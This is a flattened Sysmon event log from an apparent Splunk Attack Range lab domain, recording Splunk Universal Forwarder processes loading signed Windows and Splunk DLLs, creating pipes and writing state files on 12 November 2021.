734700x800000000000000057344382Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:11.895{8B6011A9-5ACF-618E-37F3-04000000F101}9584C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75EtrueMicrosoft WindowsValid 734700x800000000000000057344381Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:11.895{8B6011A9-5ACF-618E-37F3-04000000F101}9584C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=8AAF6E1B14B9210052FFF90E25926D63,SHA256=F2120C8E63EA94F8618B31319A534731C16D8FDD58B0E1E70217D72A39D78353trueMicrosoft WindowsValid 734700x800000000000000057344380Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:11.879{8B6011A9-5ACF-618E-37F3-04000000F101}9584C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\combase.dll10.0.14393.4583 (rs1_release.210730-1850)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=878EBD02A580FDF8F187100127E6D3A8,SHA256=54E4BADDFBD97CFFF871B6D7316B28872218B92F37C41199F71EB37BC5634216trueMicrosoft WindowsValid 734700x800000000000000057344379Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:11.879{8B6011A9-5ACF-618E-37F3-04000000F101}9584C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\ole32.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=676B0A1FB2A01D19AECB1F19883B6FC4,SHA256=56DEB219840DBAF9DAF645AD5D79AF9AB05F20E688382854DD487F440B257552trueMicrosoft WindowsValid 734700x800000000000000057344378Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:11.879{8B6011A9-5ACF-618E-37F3-04000000F101}9584C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\gdi32full.dll10.0.14393.4530 (rs1_release.210705-0736)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=9D82D7DBC3D9E0D8E86D10A5B1BF736E,SHA256=270CA1A42ECB4C22E826C1C95924F0014CC99254AB55B7167DA144D45E238E6DtrueMicrosoft WindowsValid 734700x800000000000000057344377Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:11.879{8B6011A9-5ACF-618E-37F3-04000000F101}9584C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValid 734700x800000000000000057344376Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:11.879{8B6011A9-5ACF-618E-37F3-04000000F101}9584C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\vcruntime140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140.dllMD5=0C583614EB8FFB4C8C2D9E9880220F1D,SHA256=6CADB4FEF773C23B511ACC8B715A084815C6E41DD8C694BC70090A97B3B03FB9trueMicrosoft CorporationValid 734700x800000000000000057344375Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:11.879{8B6011A9-5ACF-618E-37F3-04000000F101}9584C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValid 734700x800000000000000057344374Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:11.879{8B6011A9-5ACF-618E-37F3-04000000F101}9584C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 734700x800000000000000057344373Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:11.879{8B6011A9-5ACF-618E-37F3-04000000F101}9584C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\Wldap32.dll10.0.14393.3269 (rs1_release.190929-1234)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=12D6C3E8AC705BB42D377C05714F551C,SHA256=E67F6DB96F062A319312C365F1F55B2B38B0F90B77FFDA2522418709CBA45EB3trueMicrosoft WindowsValid 734700x800000000000000057344372Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:11.879{8B6011A9-5ACF-618E-37F3-04000000F101}9584C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0trueMicrosoft WindowsValid 734700x800000000000000057344371Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:11.879{8B6011A9-5ACF-618E-37F3-04000000F101}9584C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\archive.dll-----MD5=98978F08A7A0D24C92FE8DC5287A8258,SHA256=CBB940A38E834C0BE44884C667863F76D6700D564043F90B3EB813370C3174E7trueSplunk, Inc.Valid 734700x800000000000000057344370Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:11.879{8B6011A9-5ACF-618E-37F3-04000000F101}9584C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\adsldpc.dll10.0.14393.0 (rs1_release.160715-1616)ADs LDAP Provider C DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationadsldpcMD5=F03FD7F523CFDBB96B0F3B8012FC161D,SHA256=8218E5AC2D7A52A2D50CD8D3CC8AA8CE4E37D1BDECFA62BC2637AA32A01CBA54trueMicrosoft WindowsValid 734700x800000000000000057344369Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:11.879{8B6011A9-5ACF-618E-37F3-04000000F101}9584C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\libeay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/libeay32.dllMD5=6445BD4247E3956B244772F3C415585F,SHA256=2B08FC9E160AD0F698226DA3E30A12551E8EBCCA1E7287E3915EC62B58151A78trueSplunk, Inc.Valid 734700x800000000000000057344368Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:11.879{8B6011A9-5ACF-618E-37F3-04000000F101}9584C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\rpcrt4.dll10.0.14393.4467 (rs1_release.210604-1844)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=B0C4BF9491FB453B77399E3C56C11DC8,SHA256=66D5D1B3D25D15EA8737C8B2EF83E770BA10931868F24DCACC50936F0A0BAC08trueMicrosoft WindowsValid 734700x800000000000000057344367Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:11.879{8B6011A9-5ACF-618E-37F3-04000000F101}9584C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec-openssl.dll-----MD5=F30BB43EC30BE50400780223450492CD,SHA256=867D0453E285A5C29A4EFA039D2399662DCCAC98F88C46B0A41CEFB6B68DD836trueSplunk, Inc.Valid 734700x800000000000000057344366Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:11.879{8B6011A9-5ACF-618E-37F3-04000000F101}9584C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=E6B98644CD3B912C44C39CC0996790A9,SHA256=23BE56E1B8DBA449C0959753175BD15457EC88E93E9E8B86489266347959A6F2trueMicrosoft WindowsValid 734700x800000000000000057344365Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:11.879{8B6011A9-5ACF-618E-37F3-04000000F101}9584C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec.dll-----MD5=D98BAB348C28C8CFCC11EDB575E2557A,SHA256=ADA3F1256B175ECC390F126D2730D7A1AAB5A53F1AF205A7667D8010416602F9trueSplunk, Inc.Valid 734700x800000000000000057344364Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:11.879{8B6011A9-5ACF-618E-37F3-04000000F101}9584C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\ssleay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/ssleay32.dllMD5=B20FA07A7A61791EE537B5945429E141,SHA256=EF53BC2AB58BC548EFA249B0B8F2E1FBB9D4739EF27B0C67DFF1468D555329D3trueSplunk, Inc.Valid 734700x800000000000000057344363Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:11.879{8B6011A9-5ACF-618E-37F3-04000000F101}9584C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\libxslt.dll-----MD5=B8D3119CE62331C6A9B170DA0A608F28,SHA256=7D6C6B7C542B4E67AA468FEB12044E2EE34CE8F8A68C7665D7861F3363B6E66AtrueSplunk, Inc.Valid 734700x800000000000000057344362Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:11.879{8B6011A9-5ACF-618E-37F3-04000000F101}9584C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValid 734700x800000000000000057344361Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:11.879{8B6011A9-5ACF-618E-37F3-04000000F101}9584C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\libxml2.dll2.9.9libxml2 librarylibxml2-libxml2.dllMD5=0E7B7B3B25A2F094EB3A7BAF471154B8,SHA256=6CFAC8D8D5B7345F2C6CC82CBF8F9DD475881EA260346BE283E52B822F2CCAC1trueSplunk, Inc.Valid 734700x800000000000000057344360Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:11.879{8B6011A9-5ACF-618E-37F3-04000000F101}9584C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 734700x800000000000000057344359Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:11.879{8B6011A9-5ACF-618E-37F3-04000000F101}9584C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\activeds.dll10.0.14393.4169 (rs1_release.210107-1130)ADs Router Layer DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationADsMD5=C62947CD1080E3B128B517AE91B22D6D,SHA256=6BB5D8967F822B5B1646DC9069212914D36C4D3D65E086AC0890B6A02112B438trueMicrosoft WindowsValid 734700x800000000000000057344358Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:11.879{8B6011A9-5ACF-618E-37F3-04000000F101}9584C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\fltLib.dll10.0.14393.0 (rs1_release.160715-1616)Filter LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationfilterLib.dllMD5=051ABD8360BDA63A1BC77C662FBF0A25,SHA256=C914E2DBAEC2C9A11923A984B30A979637D3A27B3C29E93F4C90FB1D9FBC518FtrueMicrosoft WindowsValid 734700x800000000000000057344357Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:11.879{8B6011A9-5ACF-618E-37F3-04000000F101}9584C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\advapi32.dll10.0.14393.4467 (rs1_release.210604-1844)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=A8CDCAC5C32D14ED8AADDF5489FC5D55,SHA256=140F07A8F6780DAFE20CC4FBE86C9332FB2F0C26ED8F49914BD05265C63EF6F1trueMicrosoft WindowsValid 10341000x800000000000000057344356Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:11.879{8B6011A9-BB8B-618B-50A0-04000000F101}92124768C:\Windows\system32\conhost.exe{8B6011A9-5ACF-618E-37F3-04000000F101}9584C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000057344355Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:11.879{8B6011A9-5ACF-618E-37F3-04000000F101}9584C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=0F627827D9CFFA8E0BCF30F013FB7209,SHA256=EA47C3E471801ACA92EE449C66CF785EA670ADE92A5A2D5CDB81C93DD72ABEF0trueMicrosoft WindowsValid 734700x800000000000000057344354Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:11.879{8B6011A9-5ACF-618E-37F3-04000000F101}9584C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 734700x800000000000000057344353Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:11.879{8B6011A9-5ACF-618E-37F3-04000000F101}9584C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\ntdll.dll10.0.14393.4530 (rs1_release.210705-0736)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=36B87C41EE39F3051D116F735EBEF866,SHA256=9C45BAE6D7E27B3AE04BBF88B96686C04ED6A43695558E82B687013BA0383F8AtrueMicrosoft WindowsValid 734700x800000000000000057344352Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:11.879{8B6011A9-5ACF-618E-37F3-04000000F101}9584C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exeMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3trueSplunk, Inc.Valid 10341000x800000000000000057344351Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:11.879{8B6011A9-8868-6164-0500-00000000F101}424520C:\Windows\system32\csrss.exe{8B6011A9-5ACF-618E-37F3-04000000F101}9584C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000057344350Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:11.879{8B6011A9-BB8A-618B-4CA0-04000000F101}74521152C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{8B6011A9-5ACF-618E-37F3-04000000F101}9584C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000057344349Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:11.864{8B6011A9-5ACF-618E-37F3-04000000F101}9584C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{8B6011A9-886B-6164-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3{8B6011A9-BB8A-618B-4CA0-04000000F101}7452C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 18141800x800000000000000057344348Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:15:11.863{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x800000000000000057344347Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreatePipe2021-11-12 12:15:11.863{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x800000000000000057344346Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:15:11.863{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x800000000000000057344345Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreatePipe2021-11-12 12:15:11.863{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x800000000000000057344344Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:15:11.863{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x800000000000000057344343Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreatePipe2021-11-12 12:15:11.863{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 11241100x800000000000000057344342Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:11.628{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057344341Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:11.628{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D06EDC2B4D7B1349B1E468FC445F9431,SHA256=FBBA76C376EC9C30FDF315148AE6DB1B0732CF75633B733D747F70F27E84536Efalsetrue 11241100x800000000000000057344340Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:11.464{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057344339Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:11.464{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=055AE02E2DCB8D2C26C1F43F28EDBE57,SHA256=96CDCE3ED1CD7C34778656E541B9878CFAB81B7A56ABE3F557CA7C876D3B4359falsetrue 534500x800000000000000057344338Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:11.394{8B6011A9-5ACF-618E-36F3-04000000F101}9168C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe 734700x800000000000000057344337Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:11.379{8B6011A9-5ACF-618E-36F3-04000000F101}9168C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValid 10341000x800000000000000057344336Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:11.379{8B6011A9-5ACF-618E-36F3-04000000F101}91686404C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{8B6011A9-BB8A-618B-4CA0-04000000F101}7452C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000057344335Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:11.379{8B6011A9-5ACF-618E-36F3-04000000F101}9168C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\dbgcore.dll10.0.14321.1024 (debuggers(dbg).210127-1811)Windows Core Debugging HelpersMicrosoft® Windows® Operating SystemMicrosoftDBGCORE.DLLMD5=72E8FEC8419AB470FB737883463688FE,SHA256=1DA7D2D2D1C4E6EC17101A4997C4AA610818730D63C72C1D2084ABA3F25C5146trueMicrosoft WindowsValid 734700x800000000000000057344334Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:11.379{8B6011A9-5ACF-618E-36F3-04000000F101}9168C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\dbghelp.dll10.0.14321.1024 (rs1_release.160715-1616)Windows Image HelperMicrosoft® Windows® Operating SystemMicrosoftDBGHELP.DLLMD5=2C92DF5D32661FB4B81B08B72B2102A7,SHA256=BCEF4DEBDE7D8D6916EE3D3E5E63A725E03A058AABCD7DD49DF9D48B16E96D1AtrueMicrosoft WindowsValid 23542300x800000000000000021219268Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:11.075{AD5E2759-54C7-6143-A600-00000000F101}4072NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=191BF671B22BB6D0D8098F4764225CD4,SHA256=587F0439BC6F77A0432866DC98383BB4980C713A6CBE1D9A500FD8BFA4A6C98D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 734700x800000000000000057344333Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:11.210{8B6011A9-5ACF-618E-36F3-04000000F101}9168C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FEtrueMicrosoft WindowsValid 734700x800000000000000057344332Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:11.210{8B6011A9-5ACF-618E-36F3-04000000F101}9168C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\rsaenh.dll10.0.14393.4467 (rs1_release.210604-1844)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft 